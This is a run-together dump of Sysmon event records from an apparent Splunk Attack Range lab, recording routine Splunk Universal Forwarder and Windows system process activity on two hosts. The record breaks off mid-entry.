AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-14.attackrange.local58393-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 23542300x8000000000000000104828Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:45:58.625{54715871-FD3A-60C9-7600-00000000CF01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=40C49A83B919E5D6F7F16E450D83F94C,SHA256=C588B1E552971D2A2562CFF5AFFD6F23E391AE60BB82D0029F65C2FB6FA78277,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000151291Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:58.857{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1BC2B8229658CC15A70047F6E6815698,SHA256=22F96E65AF947DF0A2D916716D0DB9496218D71B6A3E7DBA04FD244C3BA837C6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000151292Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:59.872{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=31FEF415A304FB4B908FBA33B0E06ECE,SHA256=DC60113D02975EB384CD8DE50F35A81B2CC36240E217F30861B5C1A9246B7B94,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000104837Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:46:00.597{54715871-FD29-60C9-3700-00000000CF01}33683396C:\Windows\system32\conhost.exe{54715871-7118-60CA-2913-00000000CF01}4256C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104836Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:46:00.597{54715871-FD18-60C9-0C00-00000000CF01}8486924C:\Windows\system32\svchost.exe{54715871-FD28-60C9-2B00-00000000CF01}3040C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104835Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:46:00.596{54715871-FD18-60C9-0C00-00000000CF01}8486924C:\Windows\system32\svchost.exe{54715871-FD28-60C9-2B00-00000000CF01}3040C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104834Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:46:00.595{54715871-FD18-60C9-0C00-00000000CF01}8486924C:\Windows\system32\svchost.exe{54715871-FD28-60C9-2B00-00000000CF01}3040C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104833Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:46:00.595{54715871-FD18-60C9-0C00-00000000CF01}8486924C:\Windows\system32\svchost.exe{54715871-FD28-60C9-2B00-00000000CF01}3040C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104832Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:46:00.594{54715871-FD16-60C9-0500-00000000CF01}408368C:\Windows\system32\csrss.exe{54715871-7118-60CA-2913-00000000CF01}4256C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000104831Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:46:00.594{54715871-FD28-60C9-3000-00000000CF01}24483280C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{54715871-7118-60CA-2913-00000000CF01}4256C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000104830Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:46:00.593{54715871-7118-60CA-2913-00000000CF01}4256C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{54715871-FD16-60C9-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{54715871-FD28-60C9-3000-00000000CF01}2448C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000104829Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:46:00.592{54715871-FD3A-60C9-7600-00000000CF01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E380498B5615C988F799F5DF29650CEF,SHA256=85258F246473B9A1E61B561BEA0C76F3198DFF73957E0C4DAD68CC5879695B67,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000151293Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:00.873{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=84DDD8149207B7A7F566432FE1C50424,SHA256=30793B0F5B201412C2585F9D30DDAD16FC96505A5B312F01A404CF128F1F6A9A,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000104854Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:46:01.993{54715871-FD29-60C9-3700-00000000CF01}33683396C:\Windows\system32\conhost.exe{54715871-7119-60CA-2B13-00000000CF01}1320C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104853Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:46:01.990{54715871-FD18-60C9-0C00-00000000CF01}8486924C:\Windows\system32\svchost.exe{54715871-FD28-60C9-2B00-00000000CF01}3040C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104852Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:46:01.990{54715871-FD18-60C9-0C00-00000000CF01}8486924C:\Windows\system32\svchost.exe{54715871-FD28-60C9-2B00-00000000CF01}3040C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104851Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:46:01.990{54715871-FD16-60C9-0500-00000000CF01}408424C:\Windows\system32\csrss.exe{54715871-7119-60CA-2B13-00000000CF01}1320C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000104850Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:46:01.990{54715871-FD18-60C9-0C00-00000000CF01}8486924C:\Windows\system32\svchost.exe{54715871-FD28-60C9-2B00-00000000CF01}3040C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104849Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:46:01.990{54715871-FD18-60C9-0C00-00000000CF01}8486924C:\Windows\system32\svchost.exe{54715871-FD28-60C9-2B00-00000000CF01}3040C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104848Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:46:01.989{54715871-FD28-60C9-3000-00000000CF01}24483280C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{54715871-7119-60CA-2B13-00000000CF01}1320C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000104847Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:46:01.989{54715871-7119-60CA-2B13-00000000CF01}1320C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{54715871-FD16-60C9-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{54715871-FD28-60C9-3000-00000000CF01}2448C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000104846Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:46:01.988{54715871-FD3A-60C9-7600-00000000CF01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=42ED2201474FB84173A8981C1A716895,SHA256=C54719B093C731B6C7EE1049364231D56558B783539040D536D61A992F286F12,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000104845Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:46:01.314{54715871-FD29-60C9-3700-00000000CF01}33683396C:\Windows\system32\conhost.exe{54715871-7119-60CA-2A13-00000000CF01}2984C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104844Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:46:01.313{54715871-FD18-60C9-0C00-00000000CF01}8486924C:\Windows\system32\svchost.exe{54715871-FD28-60C9-2B00-00000000CF01}3040C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104843Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:46:01.312{54715871-FD18-60C9-0C00-00000000CF01}8486924C:\Windows\system32\svchost.exe{54715871-FD28-60C9-2B00-00000000CF01}3040C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104842Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:46:01.312{54715871-FD18-60C9-0C00-00000000CF01}8486924C:\Windows\system32\svchost.exe{54715871-FD28-60C9-2B00-00000000CF01}3040C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104841Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:46:01.312{54715871-FD18-60C9-0C00-00000000CF01}8486924C:\Windows\system32\svchost.exe{54715871-FD28-60C9-2B00-00000000CF01}3040C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104840Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:46:01.312{54715871-FD16-60C9-0500-00000000CF01}408524C:\Windows\system32\csrss.exe{54715871-7119-60CA-2A13-00000000CF01}2984C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000104839Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:46:01.311{54715871-FD28-60C9-3000-00000000CF01}24483280C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{54715871-7119-60CA-2A13-00000000CF01}2984C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000104838Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:46:01.311{54715871-7119-60CA-2A13-00000000CF01}2984C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{54715871-FD16-60C9-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{54715871-FD28-60C9-3000-00000000CF01}2448C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000151294Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:01.890{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5D5C6FB9CF879B74CCFB8869543428E8,SHA256=162BF021F6D3B34A849F7BA018E2CBE355EB1A0E8B13C8B8EC050C85AFBFC772,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000104865Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:46:02.834{54715871-711A-60CA-2C13-00000000CF01}37484680C:\Program 